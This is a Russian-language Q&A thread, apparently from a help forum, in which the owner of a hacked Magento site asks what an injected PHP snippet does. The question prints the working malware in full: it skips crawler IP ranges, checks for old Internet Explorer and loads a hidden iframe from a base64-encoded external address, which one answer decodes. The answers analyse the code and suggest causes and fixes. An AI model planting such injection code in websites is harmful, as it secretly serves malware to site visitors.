Веб-приложение PHP (Magento) взломано;Что делает этот хакерский код?

Question

Меня только что взломали на моей установке Magento 1.3.2.4. Можете ли вы сказать мне, какова цель этого кода?

Кроме того, как это остановить и как обнаружить уязвимость?

Спасибо

function net_match ( $network , $ip ) {
$ip_arr = explode ( '/' , $network );
$network_long = ip2long ( $ip_arr [ 0 ]);
$x = ip2long ( $ip_arr [ 1 ]);
$mask = long2ip ( $x ) == $ip_arr [ 1 ] ? $x : 0xffffffff << ( 32 - $ip_arr [ 1 ]);
$ip_long = ip2long ( $ip );
return ( $ip_long & $mask ) == ( $network_long & $mask );
}


$ip=$_SERVER['REMOTE_ADDR'];

$user_agent = $_SERVER['HTTP_USER_AGENT'];


$user_agent = $_SERVER["HTTP_USER_AGENT"];

$IP = $_SERVER['REMOTE_ADDR'].".log";

@mkdir('/tmp/Location/');

$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');

if(!file_exists("/tmp/Location/{$IP}"))
{


if(
net_match('64.233.160.0/19',$ip)==0 &&
net_match('66.102.0.0/20',$ip)==0 &&
net_match('66.249.64.0/19',$ip)==0 &&
net_match('72.14.192.0/18',$ip)==0 &&
net_match('74.125.0.0/16',$ip)==0 &&
net_match('89.207.224.0/24',$ip)==0 &&
net_match('193.142.125.0/24',$ip)==0 &&
net_match('194.110.194.0/24',$ip)==0 &&
net_match('209.85.128.0/17',$ip)==0 &&
net_match('216.239.32.0/19',$ip)==0 &&
net_match('128.111.0.0/16',$ip)==0 &&
net_match('67.217.0.0/16',$ip)==0 &&
net_match('188.93.0.0/16',$ip)==0
)

{
if(strpos($user_agent, "Windows") !== false)
{
if (preg_match("/MSIE 6.0/", $user_agent) OR
    preg_match("/MSIE 7.0/", $user_agent) OR
    preg_match("/MSIE 8.0/", $user_agent)
)
{
echo '<iframe frameborder=0 src="'.$dfjgkbl.'" width=1 height=1 scrolling=no></iframe>';

touch ("/tmp/Location/{$IP}");

}}}}

Answer 1

Просто дружеский совет: если вы используете FileZilla в качестве агента FTP, он сохраняет сохраненные пароли в XML-файле, на вашем компьютере может быть вирус, который может подключиться к FileZilla к вашему серверу и записать его в ваши файлы. Также проверьте свой CPanel и найдите учетные записи FTP, которые не созданы вами. Это может быть не так, просто проверьте в любом случае.

Answer 2

Создает iframe, который направляет людей на другой сайт.Переменная dfjgkbl содержит кодировку base64 URL;если вы хотите знать, что это такое, доступны онлайн-декодеры base64.Я не буду вставлять его сюда, потому что URL, вероятно, содержит вирус Windows, основанный на остальной части вашего кода.

Answer 3

Сначала обновите ваш Magento, это похоже на очень старую версию.

Ваш взломанный код - это общий код вируса php, который мы видим каждый раз, это автоматический вирус, который передается с вашего компьютера на сервер или с сервера на сервер

также вы можете использовать бесплатный плагин, такой как: magefirewall для защиты вашего magento.

P.S. Im один из разработчиков

Answer 4

У меня также была похожая проблема с Total Commander ... Вирус использовал учетную запись TC FTP и полностью изменил мой веб-сайт (Joomla CMS) и добавил подобный вредоносный код почти в каждый файл php.

Answer 5

$dfjgkbl=base64_decode('aHR0cDovLzEyOS4xMjEuMzguMTAyL0hvbWUvaW5kZXgucGhw');

идет к:

НЕ НАЖИМАЙТЕ ЭТО (это ХАКЕРСКАЯ ССЫЛКА) >>>> 129.121.38.102 / Home / index.php

Хакер создает журнал всего, что идет на ваш сайт.